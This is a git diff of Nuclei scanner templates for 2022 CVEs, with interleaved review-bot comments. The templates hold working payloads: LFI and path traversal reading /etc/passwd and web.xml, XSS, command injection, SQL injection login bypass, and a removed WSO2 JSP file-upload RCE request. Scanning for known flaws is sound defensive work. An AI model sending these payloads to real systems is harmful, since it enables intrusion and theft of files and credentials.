@@ -0,0 +1,49 @@ +id: CVE-2022-29014 + +info: + name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion + author: edoardottt + severity: high + description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system. + remediation: | + Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability. + reference: + - https://www.exploit-db.com/exploits/50864 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 + - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila + - https://packetstormsecurity.com/files/166683/Razer-Sila-2.0.418-Local-File-Inclusion.html + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29014 + epss-score: 0.77285 + epss-percentile: 0.98135 + cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: razer + product: sila_firmware + tags: cve,cve2022,edb,packetstorm,razer,lfi,router + +http: + - raw: + - | + POST /ubus/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100fa422597b17ed8103daea7b9b7c129502f25b691034e1c73b5e6f98089537455022042b8117c0c1f7a96f5dfed6a5cc2244e045d23ecfb50bd7a34715f8bf79b1d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29299.yaml b/nuclei-templates/CVE-2022/cve-2022-29299.yaml index cacf113fb8..d334a36759 100644 
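Review bot: The raw POST body embeds a fixed 32-hex ubus session id with no comment saying where it comes from, so a later maintainer cannot tell whether it is a stable value from the public write-up or an instance-specific token that will make the template silently stop matching; a one-line comment above the `raw` body, `# session id as used in the referenced advisory (exploit-db 50864) — presumably not instance-specific, confirm before changing`, would settle that. The `status: 200` matcher adds little if the ubus JSON-RPC endpoint also answers 200 on error, as JSON-RPC endpoints commonly do, which would leave the `root:.*:0:0:` regex carrying the whole decision; that is acceptable but worth stating in the same comment. Minor style point: `description` is a plain scalar here while the sibling templates in this commit use a `|` block scalar.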
--- a/nuclei-templates/CVE-2022/cve-2022-29299.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-29299.yaml @@ -6,17 +6,26 @@ info: severity: medium description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/50967 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cve-id: CVE-2022-29299 + epss-score: 0.00175 + epss-percentile: 0.53704 metadata: verified: true + max-request: 1 shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview,edb + tags: cve2022,cve,xss,solarview,edb -requests: +http: - method: GET path: - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' @@ -38,5 +47,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs 06/21/2022 +# digest: 4a0a004730450220673dc09a9e66945d3637df5b363f262144bea056b46b6df86841bfd376ae1c290221008cbc66ea88991d111c727cdec2f06797a521103da95bc92272406df8e87890a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29301.yaml b/nuclei-templates/CVE-2022/cve-2022-29301.yaml new file mode 100644 index 0000000000..9841826381 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29301.yaml 
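Review bot: The `classification` block still carries only `cve-id` after this update, while `cve-2022-30776.yaml` in the same commit records `cvss-metrics`, `cvss-score` and `cwe-id: CWE-79` for the same class of reflected XSS; adding `cwe-id: CWE-79` plus the `cvss-metrics`/`cvss-score` pair taken from the NVD record would keep severity filtering consistent across the set. The new `cve-2022-29301.yaml` has the same gap and additionally lacks the `epss-score`/`epss-percentile` pair that this hunk adds. Both templates also share the `shodan-query: http.favicon.hash:-244067125` fingerprint, whereas `cve-2022-29303.yaml` for the same product uses `http.html:"SolarView Compact"`; picking one query for the product would make the three templates easier to maintain together.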
@@ -0,0 +1,48 @@ +id: CVE-2022-29301 + +info: + name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting + author: For3stCo1d + severity: high + description: | + SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact. + reference: + - https://www.exploit-db.com/exploits/50968 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cve-id: CVE-2022-29301 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-244067125 + tags: cve,cve2022,xss,solarview,edb + +http: + - method: GET + path: + - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<script>alert(document.domain)</script><"">' + - 'SolarView' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d38ffbd6542c292bb1f0cc27a0f800b5723872c60c562f22a60f1da6b998c8d5022100a20ec0c2ea61b699dd97b70ca196faf415a635099331772a14498dcbac2b3839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29303.yaml b/nuclei-templates/CVE-2022/cve-2022-29303.yaml new file mode 100644 index 0000000000..3f9b0f07ff --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29303.yaml 
@@ -0,0 +1,58 @@ +id: CVE-2022-29303 + +info: + name: SolarView Compact 6.00 - OS Command Injection + author: badboycxcc + severity: critical + description: | + SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. + remediation: | + Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. + reference: + - https://www.exploit-db.com/exploits/50940 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 + - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing + - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29303 + cwe-id: CWE-78 + epss-score: 0.9598 + epss-percentile: 0.99429 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: contec + product: sv-cpt-mc310_firmware + shodan-query: http.html:"SolarView Compact" + tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec +variables: + cmd: "cat${IFS}/etc/passwd" + +http: + - raw: + - | + @timeout: 25s + POST /conf_mail.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" + + - type: word + part: body + words: + - "p1_network_mail.cgi" +# digest: 
4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/cve-2022-29383.yaml b/nuclei-templates/CVE-2022/cve-2022-29383.yaml
deleted file mode 100644
index c0522654b9..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-29383.yaml
+++ /dev/null
@@ -1,46 +0,0 @@ -id: CVE-2022-29383 - -info: - name: NETGEAR ProSafe SSL VPN firmware - SQL Injection - author: elitebaz - severity: critical - description: | - NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. - reference: - - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383 - - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29383 - - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-29383 - metadata: - verified: "true" - tags: cve,cve2022,sqli,netgear,router - -requests: - - raw: - - | - POST /scgi-bin/platform.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd - - - | - POST /scgi-bin/platform.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd - - req-condition: true - matchers: - - type: dsl - dsl: - - contains(body_1, "User authentication Failed") - - contains(body_2, "User Login Failed for SSLVPN User.") - condition: and - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/cve-2022-29455.yaml b/nuclei-templates/CVE-2022/cve-2022-29455.yaml deleted file mode 100644 index d46b7b79d9..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29455.yaml +++ /dev/null 
@@ -1,56 +0,0 @@ -id: CVE-2022-29455 - -info: - name: WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting - author: rotembar,daffainfo - severity: medium - description: | - WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model. - reference: - - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor - - https://www.rotem-bar.com/elementor - - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-5-5-unauthenticated-dom-based-reflected-cross-site-scripting-xss-vulnerability - - https://nvd.nist.gov/vuln/detail/CVE-2022-29455 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-29455 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,wordpress,elementor - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/elementor/readme.txt' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Elementor Website Builder' - - - type: dsl - dsl: - - compare_versions(version, '<= 3.5.5') - - - type: status - status: - - 200 - - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-29464.yaml b/nuclei-templates/CVE-2022/cve-2022-29464.yaml deleted file mode 100644 index c82331a780..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29464.yaml +++ /dev/null 
@@ -1,48 +0,0 @@ -id: CVE-2022-29464 - -info: - name: WSO2 Management - Arbitrary File Upload & Remote Code Execution - author: luci,dhiyaneshDk - severity: critical - description: | - Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. - reference: - - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/ - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738 - - https://github.com/hakivvi/CVE-2022-29464 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29464 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-29464 - cwe-id: CWE-434 - metadata: - shodan-query: http.favicon.hash:1398055326 - tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev - -requests: - - raw: - - | - POST /fileupload/toolsAny HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311 - Content-Length: 348 - - -----------------------------250033711231076532771336998311 - Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp";filename="test.jsp" - Content-Type: application/octet-stream - - <% out.print("WSO2-RCE-CVE-2022-29464"); %> - -----------------------------250033711231076532771336998311-- - - - | - GET /authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers: - - type: dsl - dsl: - - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')" - -# Enhanced by mp on 2022/05/19 
diff --git a/nuclei-templates/CVE-2022/cve-2022-30776.yaml b/nuclei-templates/CVE-2022/cve-2022-30776.yaml index ee863c1351..f912a8432c 100644 --- a/nuclei-templates/CVE-2022/cve-2022-30776.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-30776.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. reference: - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 - https://www.atmail.com/ - https://help.atmail.com/hc/en-us/sections/115003283988 - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 + - https://medium.com/%40bhattronit96/cve-2022-30776-cd34f977c2b9 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30776 cwe-id: CWE-79 + epss-score: 0.00112 + epss-percentile: 0.43631 + cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: atmail + product: atmail shodan-query: http.html:"atmail" - verified: "true" - tags: cve,cve2022,atmail,xss + tags: cve2022,cve,atmail,xss -requests: +http: - method: GET path: - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -41,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
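Review bot: The added reference `https://medium.com/%40bhattronit96/cve-2022-30776-cd34f977c2b9` is the same URL as the existing first entry with `@` percent-encoded, so the list now carries a duplicate; keep one spelling and drop the added line. The new `cve-2022-30777.yaml` in this commit has the identical duplicate pair for its Medium post.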
diff --git a/nuclei-templates/CVE-2022/cve-2022-30777.yaml b/nuclei-templates/CVE-2022/cve-2022-30777.yaml
new file mode 100644
index 0000000000..d36995911c
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-30777.yaml
@@ -0,0 +1,56 @@ +id: CVE-2022-30777 + +info: + name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting + author: 3th1c_yuk1 + severity: medium + description: | + Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. + reference: + - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 + - https://en.wikipedia.org/wiki/H-Sphere + - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 + - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30777 + cwe-id: CWE-79 + epss-score: 0.00087 + epss-percentile: 0.36061 + cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: parallels + product: h-sphere + shodan-query: title:"h-sphere" + tags: cve,cve2022,parallels,hsphere,xss + +http: + - method: GET + path: + - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - '<TITLE>"><script>alert(document.domain)</script>' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a004730450220193f90816efc79d2ac468c37e58a42add449c9c53f48ed07934c74f756d9550d022100bc87714095325fe51d81827336aa365718a61f67c95e590fea50198ba245e3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/cve-2022-31268.yaml b/nuclei-templates/CVE-2022/cve-2022-31268.yaml
new file mode 100644
index 0000000000..061d0ca131
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-31268.yaml
@@ -0,0 +1,58 @@ +id: CVE-2022-31268 + +info: + name: Gitblit 1.9.3 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. + remediation: | + Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268). + reference: + - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md + - https://vuldb.com/?id.200500 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31268 + - https://github.com/Marcuccio/kevin + - https://github.com/20142995/sectool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31268 + cwe-id: CWE-22 + epss-score: 0.00618 + epss-percentile: 0.76574 + cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: gitblit + product: gitblit + shodan-query: http.html:"Gitblit" + tags: cve,cve2022,lfi,gitblit + +http: + - method: GET + path: + - "{{BaseURL}}/resources//../WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "</web-app>" + - "java.sun.com" + - "gitblit.properties" + condition: and + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e2e1fcaa58d2dee7545ceebd7a5676ce15a39fc9158480ee7246e0b44b801c19022100bd5e8b3b6dea5d148c40a77c6183f6e003c34e77f22ac9d017f7b00b202f9952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-31793.yaml b/nuclei-templates/CVE-2022/cve-2022-31793.yaml new file mode 100644 index 0000000000..0d5e0514ca --- /dev/null 
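Review bot: The `impact` text claims "remote code execution, and potential compromise of the affected system", which contradicts the template's own `cvss-metrics` (`C:H/I:N/A:N`) and `cwe-id: CWE-22`; the single request only reads `WEB-INF/web.xml`, so the impact should be scoped to disclosure, e.g. `impact: |` followed by `Unauthenticated path traversal lets a remote client read files under WEB-INF and META-INF, such as web.xml and gitblit.properties, disclosing deployment configuration.` The `remediation` line names no fixed version; the NVD entry in `reference` should supply one so the template is actionable.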
+++ b/nuclei-templates/CVE-2022/cve-2022-31793.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-31793 + +info: + name: muhttpd <=1.1.5 - Local Inclusion + author: scent2d + severity: high + description: | + muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. + remediation: Update the application to version 1.10 + reference: + - https://derekabdine.com/blog/2022-arris-advisory.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 + - https://derekabdine.com/blog/2022-arris-advisory + - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ + - http://inglorion.net/software/muhttpd/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31793 + cwe-id: CWE-22 + epss-score: 0.25241 + epss-percentile: 0.96539 + cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: inglorion + product: muhttpd + tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion +tcp: + - host: + - "{{Hostname}}" + inputs: + - data: "47455420612F6574632F706173737764" + type: hex + + - data: "\n\n" + read-size: 128 + matchers: + - type: word + part: body + encoding: hex + words: + - "726f6f743a" +# digest: 4a0a004730450220552dea540450a6b50bb4fd1647d35646f4ddf95b681f33a3d832e169c3ee54a00221008959a00adc118b209a3e73b2598a4eafc401f50232ac399d121322f839f2a04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32007.yaml b/nuclei-templates/CVE-2022/cve-2022-32007.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-32007.yaml rename to nuclei-templates/CVE-2022/cve-2022-32007.yaml 
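Review bot: The `name` reads `muhttpd <=1.1.5 - Local Inclusion`, dropping the word "File" that the `description`, the `lfi` tag and `cwe-id: CWE-22` all imply; it should be `name: muhttpd <=1.1.5 - Local File Inclusion`. `remediation` is a bare scalar stating only `Update the application to version 1.10`, unlike the `|` block scalars used elsewhere in this commit, and does not say whether later releases are also fixed; `remediation: Update muhttpd to version 1.10 or later` would be clearer, assuming later releases retain the fix. A short comment on the `inputs` entry decoding the hex payload (`# "GET a/etc/passwd" — a request line without a leading slash`) would save the next reader a round-trip through a hex decoder.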
diff --git a/nuclei-templates/CVE-2022/cve-2022-32022.yaml b/nuclei-templates/CVE-2022/cve-2022-32022.yaml index bbcd2e0040..63f2d90739 100644 --- a/nuclei-templates/CVE-2022/cve-2022-32022.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-32022.yaml @@ -6,6 +6,10 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32022 @@ -15,12 +19,18 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32022 cwe-id: CWE-89 + epss-score: 0.00897 + epss-percentile: 0.80882 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: car_rental_management_system_project + product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,login-bypass + tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project -requests: +http: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 @@ -28,12 +38,10 @@ requests: Content-Type: application/x-www-form-urlencoded username=admin'+or+'1'%3D'1'%23&password=admin - - | GET /admin/index.php?page=home HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word 
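Review bot: Dropping `cookie-reuse: true` leaves the second request (`GET /admin/index.php?page=home`) dependent on the engine reusing the session cookie set by the login response by default; that is presumably the behaviour of the engine version targeted by the `requests:` to `http:` migration, but nothing in the template says so, and on an engine without default reuse the body matcher (outside this hunk) would never fire. A comment above the second raw request, `# relies on the engine reusing the session cookie from the login response`, would make the dependency explicit.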
@@ -47,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 +# digest: 490a004630440220725a329ba41785dd96c0939334b9a1e78af7fa6421aeef4df6d2dd933c44115c0220351e53b8bd40ec2dea1271b2162432124266cbf982ff3f9fc1eaf8903b8207ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml b/nuclei-templates/CVE-2022/cve-2022-32025.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-32025.yaml rename to nuclei-templates/CVE-2022/cve-2022-32025.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-32026.yaml b/nuclei-templates/CVE-2022/cve-2022-32026.yaml deleted file mode 100644 index 39e05a5192..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32026.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2022-32026 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32409.yaml b/nuclei-templates/CVE-2022/cve-2022-32409.yaml new file mode 100644 index 0000000000..970cc96d0e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32409.yaml 
@@ -0,0 +1,48 @@ +id: CVE-2022-32409 + +info: + name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion + author: pikpikcu + severity: critical + description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. + reference: + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates 